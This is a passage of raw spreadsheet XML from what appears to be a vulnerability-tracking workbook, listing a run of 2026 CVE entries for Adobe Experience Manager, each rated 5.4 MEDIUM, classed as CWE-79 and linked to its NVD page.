      </c>
      <c r="E770" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F770" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr"/>
      <c r="Q770" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R770"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0" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75647</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75651</t>
        </is>
      </c>
      <c r="D771" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E771" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F771" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr"/>
      <c r="Q771" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R771"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1" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75651</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75652</t>
        </is>
      </c>
      <c r="D772" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E772" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F772" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr"/>
      <c r="Q772" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R772"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2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75652</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75657</t>
        </is>
      </c>
      <c r="D773" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E773" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F773" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr"/>
      <c r="Q773" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R773"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3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75657</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75659</t>
        </is>
      </c>
      <c r="D774" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L774" s="5" t="inlineStr"/>
      <c r="M774" s="5" t="inlineStr"/>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr"/>
      <c r="Q774" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R774"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4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75659</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75660</t>
        </is>
      </c>
      <c r="D775" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L775" s="5" t="inlineStr"/>
      <c r="M775" s="5" t="inlineStr"/>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr"/>
      <c r="Q775" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R775"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5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75660</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75661</t>
        </is>
      </c>
      <c r="D776" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E776" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F776" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr"/>
      <c r="Q776" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R776"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6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75661</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75666</t>
        </is>
      </c>
      <c r="D777" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E777" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F777" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr"/>
      <c r="Q777" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R777"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7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75666</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75667</t>
        </is>
      </c>
      <c r="D778" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E778" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F778" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr"/>
      <c r="K778" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr"/>
      <c r="Q778" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R778"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8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75667</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75668</t>
        </is>
      </c>
      <c r="D779" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E779" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F779" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr"/>
      <c r="Q779" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R779"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79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75668</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75670</t>
        </is>
      </c>
      <c r="D780" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E780" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F780" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr"/>
      <c r="Q780" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R780"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0" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75670</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75674</t>
        </is>
      </c>
      <c r="D781" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E781" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F781" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr"/>
      <c r="Q781" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R781"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1" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75674</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75677</t>
        </is>
      </c>
      <c r="D782" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E782" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F782" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr"/>
      <c r="Q782" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R782"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2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75677</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75683</t>
        </is>
      </c>
      <c r="D783" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E783" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F783" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr"/>
      <c r="Q783" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R783"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3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75683</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75692</t>
        </is>
      </c>
      <c r="D784" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E784" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F784" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr"/>
      <c r="Q784" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R784"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4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75692</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75700</t>
        </is>
      </c>
      <c r="D785" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E785" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F785" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr"/>
      <c r="Q785" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R785"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5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75700</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75706</t>
        </is>
      </c>
      <c r="D786" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E786" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F786" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr"/>
      <c r="Q786" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R786"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6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75706</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75709</t>
        </is>
      </c>
      <c r="D787" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E787" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F787" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr"/>
      <c r="Q787" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R787"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7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75709</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75711</t>
        </is>
      </c>
      <c r="D788" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E788" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F788" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr"/>
      <c r="K788" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr"/>
      <c r="Q788" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R788"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8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75711</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75716</t>
        </is>
      </c>
      <c r="D789" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E789" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F789" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr"/>
      <c r="Q789" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R789"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89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75716</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
